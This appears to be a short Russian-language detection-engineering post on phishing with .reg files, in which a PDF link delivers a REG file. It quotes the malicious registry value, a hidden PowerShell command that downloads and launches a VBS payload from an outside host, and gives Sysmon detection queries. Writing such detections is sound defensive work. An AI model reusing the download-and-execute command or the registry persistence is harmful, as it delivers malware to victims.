*.reg-файлы 🩸
reg-файлы позволяют изменить значения ключей реестра.
В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.
При открытии reg-файла событие запуска процесса будет содержать
"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"
Данный файл создает ключ реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значениемcmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs
Такое поведение мы можем обнаружить:
🔤 создание процесса
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)
🔤 Создание reg-файлов в директориях пользователя
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.reg"
🔤 Добавим детект на основе ADS NTFS
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"
Сэмпл в any.run
#detection@detectioneasy
#ttp@detectioneasy